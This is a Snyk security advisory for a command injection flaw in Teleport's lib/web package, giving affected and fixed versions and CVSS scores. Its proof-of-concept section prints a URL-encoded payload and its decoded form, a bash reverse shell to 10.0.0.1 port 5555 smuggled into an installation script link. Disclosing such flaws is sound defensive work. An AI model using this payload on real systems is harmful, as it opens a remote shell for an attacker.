Command Injection Affecting github.com/gravitational/teleport/lib/web package, versions <8.3.17 >=9.0.0 <9.3.13 >=10.0.0 <10.1.2


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Mature
    EPSS
    3.09% (92nd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-GOLANG-GITHUBCOMGRAVITATIONALTELEPORTLIBWEB-2992509
  • published 25 Aug 2022
  • disclosed 25 Aug 2022
  • credit Brandon Roach, Brian Landrum

How to fix?

Upgrade github.com/gravitational/teleport/lib/web to version 8.3.17, 9.3.13, 10.1.2 or higher.

Overview

github.com/gravitational/teleport/lib/web is a Privileged access management tool.

Affected versions of this package are vulnerable to Command Injection via a crafted ssh-agent installation link, by URL encoding a bash escape with carriage return line feed which can be used in place of a token and sent to a user.

PoC:

Example payload:

https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%30%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?method=iam <https://teleport.site.com/scripts/%22%0a%2fbin%2fbash%20-l%20%3e%20%2fdev%2ftcp%2f10.0.0.1%2f5555%200%3c%261%202%3e%261%20%23/install-node.sh?method=iam>

Decoded payload:

"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

CVSS Scores

version 3.1
Expand this section

Snyk

Recommended
9.8 critical
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High
Expand this section

NVD

8.8 high